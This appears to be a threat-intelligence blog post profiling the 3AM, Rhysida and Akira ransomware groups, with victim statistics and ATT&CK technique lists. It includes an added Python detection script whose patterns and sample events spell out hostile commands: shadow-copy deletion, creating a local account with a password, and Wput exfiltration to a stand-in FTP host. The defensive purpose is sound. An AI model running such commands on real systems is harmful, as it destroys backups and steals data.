3 Ransomware Group Newcomers to Watch in 2024


The Hacker News

The ransomware industry surged in 2023 as it saw an alarming 55.5% increase in victims worldwide, reaching a staggering 4,368 cases.

Figure 1: Year over year victims per quarter

The rollercoaster ride from explosive growth in 2021 to a momentary dip in 2022 was just a teaser—2023 roared back with the same fervor as 2021, propelling existing groups and ushering in a wave of formidable newcomers.

Figure 2: 2020-2023 ransomware victim count

LockBit 3.0 kept its number one spot with 1,047 victims in 2023, among them the Boeing and Royal Mail attacks. Alphv and Cl0p trailed well behind, with 445 and 384 victims attributed to them, respectively.

Figure 3: Top 3 active ransomware groups in 2023

These 3 groups were heavy contributors to the boom in ransomware attacks in 2023, but they were not the sole groups responsible. Many attacks came from emerging ransomware gangs such as 8Base, Rhysida, 3AM, Malaslocker, BianLian, Play, Akira, and others.

Newcomers to the Ransomware Industry

At Cyberint, the research team continuously tracks newly emerging ransomware groups and analyzes their potential impact. This blog looks at 3 new players in the industry, examines their impact in 2023 and delves into their TTPs.

To learn about other new players, download the 2023 Ransomware Report here.

3AM Ransomware

A newly discovered ransomware strain named 3AM has emerged, but its usage has been limited so far. In 2023 the group impacted only 20+ organizations, mostly in the USA. It is nonetheless gaining notoriety because a ransomware affiliate that tried to deploy LockBit on a target's network switched to 3AM when LockBit was blocked.

New ransomware families appear frequently, and most disappear just as quickly or never manage to gain significant traction. However, the fact that 3AM was used as a fallback by a LockBit affiliate suggests that it may be of interest to attackers and could be seen again in the future.

Interestingly, 3AM is written in Rust and appears to be an entirely new malware family. It follows a fixed sequence: it attempts to stop multiple services on the compromised computer before starting file encryption, and after encryption completes it tries to delete Volume Shadow Copy Service (VSS) snapshots so that files cannot be restored locally. Any links between its authors and known cybercrime organizations remain unclear.

Figure 4: 3AM Leaked Data

The threat actor's suspicious activity began with the gpresult command, used to dump the policy settings enforced on the computer for a specific user. They then executed various Cobalt Strike components and attempted to elevate privileges on the computer using PsExec.

Next, the attackers performed reconnaissance with commands such as whoami, netstat, quser, and net share, and used quser and net view to identify other servers for lateral movement. They also created a new user account for persistence and used the Wput tool to upload the victim's files to their FTP server.
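The chain described above (gpresult, living-off-the-land recon, PsExec, a new local account, Wput to FTP, then shadow-copy deletion) is far more telling as a sequence on one host than any single command is on its own. The following is an added example, not Cyberint's or The Hacker News' code, of a sequence-based hunt over constructed process-creation events. The article does not say which command 3AM uses to delete shadow copies or exactly how the persistence account was created, so the shadow-copy and net user patterns are assumptions; the event format and host names are constructed for the example.

```python
"""Sequence-based hunt for a 3AM-style hands-on-keyboard chain.

Added example, not code from the article. Scores constructed process-creation
events (Sysmon Event ID 1 style, reduced to timestamp, host, command line) per
host and flags hosts on which several attack stages fire within a short window.
"""
from datetime import datetime, timedelta
import re

# Stage -> regexes over the lower-cased command line. The "persistence" and
# "shadow-delete" patterns are assumed, not quoted from the article.
STAGES = {
    "policy-recon":  [r"\bgpresult(\.exe)?\b"],
    "host-recon":    [r"\bwhoami\b", r"\bnetstat\b", r"\bquser\b",
                      r"\bnet(1)?(\.exe)?\s+share\b"],
    "lateral-recon": [r"\bnet(1)?(\.exe)?\s+view\b"],
    "priv-esc":      [r"\bpsexec(64)?(\.exe)?\b"],
    "persistence":   [r"\bnet(1)?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b"],
    "exfil":         [r"\bwput(\.exe)?\b"],
    "shadow-delete": [r"\bvssadmin(\.exe)?\s+delete\s+shadows\b",
                      r"\bwmic(\.exe)?\s+shadowcopy\s+delete\b"],
}

MIN_STAGES = 4            # distinct stages needed before a host is flagged
WINDOW = timedelta(hours=2)

# Constructed sample events: (ISO timestamp, host, command line).
EVENTS = [
    ("2023-09-12T03:01:10", "srv-fs01", "gpresult /r /user CORP\\jdoe"),
    ("2023-09-12T03:03:55", "srv-fs01", "whoami /all"),
    ("2023-09-12T03:04:02", "srv-fs01", "netstat -ano"),
    ("2023-09-12T03:04:40", "srv-fs01", "quser"),
    ("2023-09-12T03:05:01", "srv-fs01", "net share"),
    ("2023-09-12T03:06:30", "srv-fs01", "net view \\\\srv-db02"),
    ("2023-09-12T03:10:12", "srv-fs01", "PsExec64.exe -s -i cmd.exe"),
    ("2023-09-12T03:12:00", "srv-fs01", "net user svc_backup P@ss123 /add"),
    ("2023-09-12T03:40:00", "srv-fs01", "wput.exe C:\\share\\finance.zip ftp://203.0.113.5/"),
    ("2023-09-12T04:15:00", "srv-fs01", "vssadmin delete shadows /all /quiet"),
    # Benign admin activity on another host: two recon commands, hours apart.
    ("2023-09-12T09:00:00", "ws-admin7", "whoami"),
    ("2023-09-12T17:30:00", "ws-admin7", "netstat -an"),
]


def classify(cmdline):
    """Return the set of stage names whose patterns match the command line."""
    low = cmdline.lower()
    return {s for s, pats in STAGES.items() if any(re.search(p, low) for p in pats)}


def hunt(events, min_stages=MIN_STAGES, window=WINDOW):
    """Return {host: sorted stage names} for every host on which at least
    `min_stages` distinct stages occur inside some sliding `window`."""
    per_host = {}
    for ts, host, cmd in sorted(events):
        t = datetime.fromisoformat(ts)
        for stage in classify(cmd):
            per_host.setdefault(host, []).append((t, stage))
    hits = {}
    for host, seq in per_host.items():
        seq.sort()
        for i, (t0, _) in enumerate(seq):
            seen = {s for t, s in seq[i:] if t - t0 <= window}
            if len(seen) >= min_stages:
                hits[host] = sorted(seen)
                break
    return hits


if __name__ == "__main__":
    for host, stages in hunt(EVENTS).items():
        print(f"{host}: {', '.join(stages)}")
```

Running it flags srv-fs01 with all seven stages and leaves ws-admin7 alone, because two recon commands eight hours apart never reach the four-stage threshold inside a two-hour window. Tune MIN_STAGES and WINDOW against your own baseline: the point is to alert on the shape of the intrusion rather than on whoami, which every administrator runs.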

The group's use of the Yugeon Web Clicks PHP script from 2004 on its own website may seem perplexing at first glance. It raises the question of why an emerging ransomware group would choose such outdated technology. There are several potential reasons for this choice, including:

  1. Obscurity: Older scripts and technologies may not be as commonly recognized by modern security tools, reducing the likelihood of detection.
  2. Simplicity: Older scripts might provide straightforward functionality without the complexities often associated with modern counterparts, making deployment and management easier.
  3. Overconfidence: The group may possess a high level of confidence in their abilities and may not see the necessity of investing in more advanced technology, particularly for their website.

It is worth noting that this choice exposes the group to certain risks. Running outdated software with known vulnerabilities leaves their own operations open to external attacks, countermeasures, or sabotage by rival threat actors.

The 3AM group's choice of an outdated PHP script illustrates how unpredictable cybercriminals can be. Even while deploying a modern ransomware strain against organizations, their choice of backend technology may be driven by a mix of strategic considerations, convenience, and overconfidence. It underscores the importance for organizations of remaining vigilant and adopting a holistic security approach, recognizing that threats can come from both state-of-the-art and antiquated technologies.

Known TTPs (tactic: technique)

  Resource Development: T1650 - Acquire Access
  Collection: T1560 - Archive Collected Data
  Impact: T1565.001 - Stored Data Manipulation
  Collection: T1532 - Archive Collected Data
  Collection: T1005 - Data from Local System

Rhysida Ransomware

The Rhysida ransomware group came into the spotlight in May/June 2023 when it launched a victim support chat portal reachable through its Tor (.onion) site. The group claims to be a "cybersecurity team" acting in its victims' best interests by targeting their systems and highlighting vulnerabilities.

In June, Rhysida drew attention after publishing stolen Chilean Army documents on its data leak site. The group has since gained notoriety for attacks on healthcare institutions, including Prospect Medical Holdings, leading government agencies and cybersecurity firms to track it closely. It has hit several high-profile entities, including the British Library, where it caused a major technology outage and sold stolen PII online, and Insomniac Games, a Sony-owned video game developer. The group has demonstrated broad reach across diverse industries.

Known TTPs (tactic: technique)

  Privilege Escalation: T1055.003 - Thread Execution Hijacking
  Privilege Escalation: T1547.001 - Registry Run Keys / Startup Folder
  Privilege Escalation: T1055 - Process Injection
  Privilege Escalation: T1548.002 - Bypass User Account Control
  Defense Evasion: T1036 - Masquerading
  Defense Evasion: T1027.005 - Indicator Removal from Tools
  Defense Evasion: T1027 - Obfuscated Files or Information
  Defense Evasion: T1620 - Reflective Code Loading
  Defense Evasion: T1564.004 - NTFS File Attributes
  Defense Evasion: T1497 - Virtualization/Sandbox Evasion
  Defense Evasion: T1564 - Hide Artifacts
  Discovery: T1083 - File and Directory Discovery
  Discovery: T1010 - Application Window Discovery
  Discovery: T1082 - System Information Discovery
  Discovery: T1057 - Process Discovery
  Discovery: T1518.001 - Security Software Discovery
  Initial Access: T1566 - Phishing
  Collection: T1005 - Data from Local System
  Collection: T1119 - Automated Collection
  Resource Development: T1587 - Develop Capabilities
  Resource Development: T1583 - Acquire Infrastructure
  Execution: T1129 - Shared Modules
  Execution: T1059 - Command and Scripting Interpreter
  Reconnaissance: T1595 - Active Scanning
  Reconnaissance: T1598 - Phishing for Information

The Akira Group

The Akira Group was discovered in March 2023 and has claimed 81 victims to date. Preliminary research suggests a strong connection between the group and the notorious Conti ransomware group. Because Conti's source code was leaked, multiple threat actors have used it to build or adapt their own ransomware, which makes it hard to tell which groups have real ties to Conti and which are merely reusing the leaked code.

Akira does, however, show telltale signs of a Conti connection: a similar overall approach, the same exclusion list of file types and directories that are skipped during encryption, and comparable functions in the code. Akira also uses the ChaCha algorithm for file encryption, implemented in a manner akin to Conti's. Finally, the individuals behind Akira have directed full ransom payments to addresses associated with the Conti group.

Akira operates as ransomware-as-a-service and affects both Windows and Linux systems. The group uses its official DLS (data leak site) to publish information about victims and updates on its activities. The threat actors concentrate primarily on the US, although they also target the UK, Australia, and other countries.

They exfiltrate data and then encrypt it, coercing victims into paying twice: once to regain access to their files and once to keep the stolen data from being published. In almost every intrusion, Akira has used compromised credentials to gain its initial foothold in the victim's environment. Notably, most of the targeted organizations had not enabled multi-factor authentication (MFA) on their VPNs. The exact origin of these credentials is uncertain, but the threat actors may have bought access or credentials on the dark web.

Known TTPs (tactic: technique)

  Exfiltration: T1567 - Exfiltration Over Web Service
  Initial Access: T1566.001 - Spearphishing Attachment
  Exfiltration: T1041 - Exfiltration Over C2 Channel
  Exfiltration: T1537 - Transfer Data to Cloud Account
  Collection: T1114.001 - Local Email Collection
  Impact: T1486 - Data Encrypted for Impact
  Initial Access: T1566.002 - Spearphishing Link
  Execution: T1059.001 - PowerShell
  Execution: T1569.002 - Service Execution
  Discovery: T1016.001 - Internet Connection Discovery
  Initial Access, Privilege Escalation, Defense Evasion, Persistence: T1078 - Valid Accounts
  Privilege Escalation, Persistence: T1547.009 - Shortcut Modification
  Initial Access: T1190 - Exploit Public-Facing Application
  Defense Evasion: T1027.001 - Binary Padding
  Exfiltration: T1029 - Scheduled Transfer
  Execution: T1059.003 - Windows Command Shell
  Initial Access: T1195 - Supply Chain Compromise
  Defense Evasion: T1036.005 - Match Legitimate Name or Location
  Privilege Escalation, Persistence: T1547.001 - Registry Run Keys / Startup Folder
  Exfiltration: T1020 - Automated Exfiltration

The ransomware industry is burgeoning, attracting new and bold groups seeking to make a name for themselves by building high-quality ransomware services and tools. In 2024, Cyberint expects several of these newer groups to expand their capabilities and emerge as dominant players alongside veteran groups such as LockBit 3.0, Cl0p, and AlphV.

Read Cyberint’s 2023 Ransomware Report for the top targeted industries and countries, a breakdown of the top 3 ransomware groups, ransomware families worth noting, newcomers to the industry, notable 2023 campaigns, and 2024 forecasts.
